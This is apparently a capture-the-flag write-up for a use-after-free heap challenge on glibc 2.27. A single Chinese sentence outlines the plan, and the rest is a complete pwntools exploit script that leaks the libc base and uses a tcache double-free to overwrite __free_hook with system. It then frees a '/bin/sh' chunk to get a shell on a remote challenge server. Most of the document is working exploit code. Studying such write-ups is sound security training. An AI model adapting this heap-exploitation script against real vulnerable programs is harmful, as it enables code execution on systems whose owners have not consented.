没有 edit 功能的 libc-2.27 下的 UAF 堆题,先泄露 libc_base,再利用 tchache bin attack 打 free_hook 为 system
from pwn import *
from struct import pack
from ctypes import *
import hashlib
def s(a):
p.send(a)
def sa(a, b):
p.sendafter(a, b)
def sl(a):
p.sendline(a)
def sla(a, b):
p.sendlineafter(a, b)
def r():
p.recv()
def pr():
print(p.recv())
def rl(a):
return p.recvuntil(a)
def inter():
p.interactive()
def debug():
gdb.attach(p)
pause()
def get_addr():
return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():
return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
context(os='linux', arch='amd64', log_level='debug')
#p = process('./pwn')
p = remote('node2.anna.nssctf.cn', 28567)
elf = ELF('./pwn')
libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.4_amd64/libc.so.6')
def add(idx, size, data = b'a'):
sla(b'>> ', b'1')
sla(b'>> ', str(idx))
sla(b'>> ', str(size))
sla(b'>> ', data)
def show(idx):
sla(b'>> ', b'2')
sla(b'>> ', str(idx))
def free(idx):
sla(b'>> ', b'3')
sla(b'>> ', str(idx))
# leak libc_base
for i in range(9):
add(i, 0x80)
for i in range(8):
free(i)
show(7)
libc_base = get_addr() - 0x70 - libc.sym['__malloc_hook']
# tcache bin attack
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
for i in range(10):
add(i, 0x60) # index 0 ~ 9
for i in range(8):
free(i) # index 0 ~ 7
free(9)
free(7)
for i in range(7):
add(i, 0x60)
add(0, 0x60, p64(free_hook))
add(0, 0x60)
add(0, 0x60, b'/bin/sh\x00')
add(1, 0x60, p64(system))
# pwn
free(0)
inter()
print(' libc_base -> ', hex(libc_base))
#debug()